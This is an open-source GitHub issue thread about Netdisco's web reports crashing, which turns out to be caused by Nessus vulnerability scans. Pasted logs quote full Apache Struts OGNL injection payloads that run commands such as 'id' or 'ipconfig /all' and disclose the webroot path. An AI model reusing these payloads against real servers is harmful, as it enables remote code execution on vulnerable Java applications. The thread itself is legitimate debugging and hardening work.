### ISSUE TITLE
IP inventory report broken

### ISSUE THREAD

**Issue by zoeloe** [netdisco/netdisco#715]
## Expected Behavior
Show some IP addresses

## Current Behavior
No results show in webpage
AND csv download seems broken
(csv file seems to start with html and does have some ip addresses following that html and ends some javascript)

## Steps to Reproduce (for bugs)
1. try to list an IP range in the inventory

## Context
broken

## Your Environment
* Netdisco version used: 2.45.2
* SNMP::Info version used: 3.70

**Comment by ollyg** [comment]
Hmm, it's working for me. Are you definitely entering an IP Prefix into the sidebar and submitting the form?

**Comment by zoeloe** [comment]
Yes. verfied. In our case (We have a class B net) e.g. x.y.36.0/24 (as suggested in dropdown matches) . Ahha, found an error in the logs:
 [26521] 2020-04-23 19:08:04 error request to GET /ajax/content/report/ipinventory crashed: Warning caught during route execution: Use of uninitialized value in pattern match (m//) at /home/netdisco/perl5/lib/perl5/App/Netdisco/Util/Web.pm line 43.
Any idea ?

**Comment by zoeloe** [comment]
Ok,... I'm pretty shure that after the upgrade to 2.45.2 I restarted the backend and web daemons...
I restarted them just now and It works again.... Don't know what happened there...I'll keep an eye on it.

**Comment by zoeloe** [comment]
IMHO something borked again:
[20031] 2020-04-28 16:35:14 error request to GET / crashed: Warning caught during route execution: Use of uninitialized value in pattern match (m//) at /home/netdisco/perl5/lib/perl5/App/Netdisco/Web/AuthN.pm line 202.
Invalid boundary in content_type: '%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','SLQ53NIj')}.multipart/form-data' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.
Invalid boundary in content_type: '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.
Use of uninitialized value in pattern match (m//) at /home/netdisco/perl5/lib/perl5/App/Netdisco/Util/Web.pm line 43.

Also noticed that VLAN inventory report and again IP inventory stopped working.

Restarting web...... backend.....

AND it works again !. So Web backend ?

**Comment by zoeloe** [comment]
Or,....  maybe now I'm thinking of it,... a security scanner (not ours) breaks the web backend  of netdisco ?..... Mhhhh... Why now ?

**Comment by rc9000** [comment]
Hi @zoeloe 

This error message looks effectively like somebody is trying something very fishy with your Netdisco server. None of the error message is from software that comes with Netdisco (opensymphony, Struts and what not), it looks like somebody is trying to inject code into the page that is targeting vulnerable Java application servers - something like this: https://cwiki.apache.org/confluence/display/WW/S2-045

If you're lucky, it's just your security guys doing a scan. If your Netdisco is reachable from the Internet, it's most likely malicious (but unsuccessful).

There is a separate problem why this makes random reports not work for you - it shouldn't -  but I think the urgent bit is finding the source of these requests in your network.

**Comment by zoeloe** [comment]
Well, the "addHeader('X-Tenable','SLQ53NIj" points in the direction of the Nessus security scanner which I know is in use with the security people at our place. 
And the Netdisco server is not reachable from the internet.
So no problem there I guess.

I'll try:

~netdisco/bin/localenv cpanm --notest Dancer::Debug
DANCER_DEBUG=1 ~/bin/netdisco-web restart

And hopefully identify the "offender" security guy.

Question remains,... why is the netdisco web bombing out ? Some recently changed code or the newly found exploit or they just started scanning the netdisco server just recently. ?

Cheers

**Comment by zoeloe** [comment]
Wrong idea for the DANCER_DEBUG ,... any hint how I could simply log the webservice behavior (http requests ?/ connections) like in a regular e.g. access.log kind of way as in apache ?

**Comment by rc9000** [comment]
So it turns out that netdisco-web logging is not highly configurable at the moment (or I didn't figure out how). But it's easy to get an Apache-style access.log by just adding this "AccessLog" line in `bin/netdisco-web-fg`:

    set plack_middlewares => [
      ['Plack::Middleware::ReverseProxy'],
      ['Plack::Middleware::AccessLog'],
      [ Expires => ( ...

Then every request is logged in logs/netdisco-web.log. Maybe we should enable this in general, with the format string read from deployment.yml.

I'm suspecting that a Nessus scan will not only execute this one exploit, but also many others in parallel. It's likely the total of it that the starman webserver (or the Plack/Dancer/Netdisco stack) can't handle.

**Comment by zoeloe** [comment]
Thanks ! Logging works great. 
And now the waiting game.... to see that the nessus scanner is logged...
The suspicion that the Nessus tests in parallel bombs the webserver is logical, I agree....
Problem is that if something breaks,.. the process seems to linger around in a broken state..
The reports remain broken till a netdisco-web restart. 
I'm guessing the API introduced in 2.45... interface breaks with the javascript injection together with /home/netdisco/perl5/lib/perl5/App/Netdisco/Util/Web.pm line 43 ? 
But, maybe I'm barking up the wrong tree here.

First I'll try to identify the breakage culprit.

**Comment by rc9000** [comment]
Yeah could be the API, could also just be that Nessus is a new toy for your OpSec team. If you can find with what test/load the reports go away that would be excellent!

If you're looking for a workaround, what we generally do is run all our NOC applications like Netdisco, various commercial stuff, Grafana, Nagios and that crusty old PHP inventory database somebody wrote in 2002 behind an Apache reverse proxy with mod_security and [OWASP CRS](https://owasp.org/www-project-modsecurity-core-rule-set/). This will block many actual attacks while still allowing your security people to find exploits that would go through. On top of that it gives you one nice https URL with everything behind, and if you're really getting into it you can also make some single-sign-on work with most applications.

This comes with its own many headaches and quite the learning curve, but if anybody is interested I can put some minimal examples into the Wiki on occasion.

**Comment by zoeloe** [comment]
It's our Opsec team, I should have known.
Found the culprit test that crashed netdisco-web:
Several other preceed and follow the "bad" test, but doen't seem to generate an error.

a.b.c.d - - [12/May/2020:18:36:01 +0200] "GET /?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23resp.print('At%201589301361%20Nessus%20found%20the%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} HTTP/1.1" 200 7026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Use of uninitialized value in pattern match (m//) at /home/netdisco/perl5/lib/perl5/App/Netdisco/Util/Web.pm line 43.
[6547] 2020-05-12 16:36:01 error request to GET / crashed: Warning caught during route execution: Use of uninitialized value in pattern match (m//) at /home/netdisco/perl5/lib/perl5/App/Netdisco/Web/AuthN.pm line 202.

Any change off making this more robust against this "attack" ?
TIA

**Comment by ollyg** [comment]
thanks, fixed in:
[master 4da860ba] #715 fix crash on missing Accept Header

**Comment by zoeloe** [comment]
After a few netdisco upgrades, the Web.pm bug seems to have sufaced again. Will enable http request log (netdisco-web-fg) mod was overwritten by upgrades) and try to find the cullprit.
running ND 2.04600 now.

**Comment by inphobia** [comment]
(perhaps needs to be a new issue, but changes are related to the ones made here)

this changes default logging behaviour, regardless of:
https://github.com/netdisco/netdisco/blob/facc41e31080cb74d252f60506a9e6e868d112b0/share/config.yml#L14

while the wiki mentions this option under "general" but in it's description only mentions the backend i'm not sure if this applies.


older version:
```
[11765] 2020-10-20 16:05:48  warn App::Netdisco 2.046002 web
[11764] 2020-10-20 16:05:48  warn App::Netdisco 2.046002 web
Use of uninitialized value $args{"mac"} in pattern match (m//) at /home/testdisc/perl5/lib/perl5/NetAddr/MAC.pm line 129, <DATA> line 755.
```
and only warnings were logged.


now:
```
[12539] 2020-10-20 16:17:58  warn App::Netdisco 2.046005 web
[12541] 2020-10-20 16:17:58  warn App::Netdisco 2.046005 web
::ffff:10.50.130.52 - - [20/Oct/2020:18:22:36 +0200] "GET /inventory HTTP/1.1" 200 27145 "http://linux002:5555/device?tab=ports&q=10.1.100.253&prefer=&f=&c_port=on&c_duplex=on&c_name=on&c_speed=on&c_speed_admin=on&c_mac=on&c_pvid=on&c_vmember=on&c_nodes=on&c_neighbors=on&mac_format=IEEE&n_inventory=on&n_detailed_inventory=on&n_age=on&n_ip4=on&n_ssid=on&n_vendor=on&age_num=3&age_unit=months&port_state=up&port_state=free&port_state=down&port_state=shut" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
```
and everything access seems to be logged.

perhaps there was some confusion because this was added to netdisco-web-fg , but netdisco-web just starts those as subprocesses.

i tested the one thing i could think of where this could pose a security issue: adding a new user. but the username & password are not logged (not sure if this is by design or by accident):
```
::ffff:10.50.130.52 - - [20/Oct/2020:18:25:05 +0200] "POST /ajax/control/admin/users/add HTTP/1.1" 200 52 "http://linux002:5555/admin/users" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
```


**possible solutions:**
 * adding the change in release notes
 * honoring log level
    * https://github.com/netdisco/netdisco/blob/facc41e31080cb74d252f60506a9e6e868d112b0/share/config.yml#L14
 * adding new config option to control this behaviour
 * only using new behaviour when starting `netdisco-web-fg`, not when being called from `netdisco-web start`

**Comment by zoeloe** [comment]
See related comment in #748.
Regards.
